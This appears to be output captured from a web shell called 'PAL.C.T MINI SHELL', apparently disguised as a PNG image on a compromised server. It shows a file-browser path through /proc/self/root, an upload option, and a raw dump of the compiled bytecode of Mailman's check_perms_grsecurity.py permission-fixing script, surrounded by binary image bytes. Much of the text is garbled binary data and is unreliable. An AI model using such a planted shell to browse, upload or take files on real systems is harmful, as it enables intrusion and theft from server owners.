php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /proc/self/root/usr/share/doc/mailman-2.1.12/contrib/
upload
files >> //proc/self/root/usr/share/doc/mailman-2.1.12/contrib/check_perms_grsecurity.pyc

Pc@sdZddkZddkZddkZddkZddkZddkZddkZddkl	Z	ddk
lZlZddk
TdZdZdZeeidS(sdFixes for running Mailman under the `secure-linux' patch or grsecurity.

Run check_perms -f and only then check_perms_grsecurity.py -f
Note that you  will have to re-run  this script after a  mailman upgrade and
that check_perms will undo part of what this script does

If you use  Solar Designer's secure-linux patch, it prevents  a process from
linking (hard link) to a file it doesn't own.
Grsecurity (http://grsecurity.net/) can have  the same restriction depending
on how it was built, including other restrictions like preventing you to run
a program if it is located in a directory writable by a non root user.

As a  result Mailman has to  be changed so that  the whole tree is  owned by
Mailman, and  the CGIs and some  of the programs  in the bin tree  (the ones
that lock config.pck  files) are SUID Mailman.  The idea  is that config.pck
files have to be owned by the  mailman UID and only touched by programs that
are UID mailman.
At the  same time, We have  to make sure  that at least 3  directories under
~mailman aren't writable by mailman: mail, cgi-bin, and bin

Binary commands that are changed to be SUID mailman are also made unreadable
and unrunnable  by people who aren't  in the mailman group.   This shouldn't
affect much since most of those commands would fail work if you weren't part
of the mailman group anyway.
Scripts in ~mailman/bin/ are  not made suid or sgid, they need  to be run by
user mailman or root to work.

Marc <marc_soft@merlins.org>/<marc_bts@vasoftware.com>
2000/10/27 - Initial version for secure_linux/openwall and mailman 2.0
2001/12/09 - Updated version for grsecurity and mailman 2.1
iN(tmm_cfg(tMAILMAN_USERt
MAILMAN_GROUP(t*tmailscgi-bintbintadd_memberst	change_pwtcheck_dbtclone_membertconfig_listtnewlisttqrunnertremove_memberstrmlisttsync_memberstupdatetwithlistcCstid}|d}t|djp|ddjotGHtidndGHtitd}xGt	D]?}tid|}t
i|d|t
i|d	|GHqpWHtid
}d|dGHt
itd}titd}t
i|||Ht
ii|p6d
|GHt|dd}|id|in
d|GHdGHtitid}	x6|	D].}|GHt
i|||t
i|dq|WdGHtid}t
i|||t
i|d|GHdGHtitid}
titid}x_|
|D]S}t
i|}|t|jp|t|jo|GHt
i|||q$q$WdGHxtD]}
t|
d}|i}|id}y|idd|
dGHWqtj
o2|i|idddxtt|ddd D]}ti d!i!||}ti d"i!||}|o1d#|
GH|i||i"dd$d}Pn|o1d#|
GH|i||i"dd$d}Pq!q!W|djod%|
d&GHd'GHqt|
d}|i#|qXqWdS((Ns/bin/sCheckFixUid.pyiis-fs9Making select directories owned and writable by root onlyt/iis/data/last_mailman_versiontMakingsowned by mailman (not root)s	Creating twisimport sys
import os
import grp, pwd
from Mailman.mm_cfg import MAILMAN_USER, MAILMAN_GROUP

class CheckFixUid:
    uid = pwd.getpwnam(MAILMAN_USER)[2]
    gid = grp.getgrnam(MAILMAN_GROUP)[2]
    if os.geteuid() == 0:
        os.setgid(gid)
        os.setuid(uid)
    if os.geteuid() != uid:
        print "You need to run this script as root or mailman because it was configured to run"
        print "on a linux system with a security patch which restricts hard links"
        sys.exit()
sSkipping creation of s
Making cgis setuid mailmans
/cgi-bin/*i
s#
Making mail wrapper setuid mailmans
/mail/mailmans;
Ensuring that all config.db/pck files are owned by Mailmans/lists/*/config.db*s/lists/*/config.pck*s6
Patching mailman scripts to change the uid to mailmantrsimport CheckFixUid
s
Not patching s, already patcheds
import paths
is^([   ]*)main\(s^([     ]*).*=[      ]*main\(s	Patching sCheckFixUid.CheckFixUid()
sWarning, file s couldn't be patched.s0If you use it, mailman may not function properly($tpathstprefixtlent__doc__tsystexittgrptgetgrnamRtdirstochownroottostchowntchmodtpwdtgetpwnamRtpathtexiststopentwritetclosetglobtstattST_UIDtST_GIDtbinfilestopatcht	readlinestindext
ValueErrortinserttrangetretcompiletsearchtgroupt
writelines(targvtbinpathtdroplibtgidtdirtdirpathtfiletuidtfptcgistcdbstcpcksR*tscripttfilefdtpatchedtitobjecttobject2((st/builddir/build/BUILDROOT/mailman-2.1.12-18.el6.i386//usr/share/doc/mailman-2.1.12/contrib/check_perms_grsecurity.pytmainHs

$	

		
"

					

	(Rscgi-binsbin(RRRR	R
RRR
RRsupdateR(RRRRR3R)R"RtMailmanRtMailman.mm_cfgRRR*RR-RJR8(((st/builddir/build/BUILDROOT/mailman-2.1.12-18.el6.i386//usr/share/doc/mailman-2.1.12/contrib/check_perms_grsecurity.pyt<module>2s 
	n
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`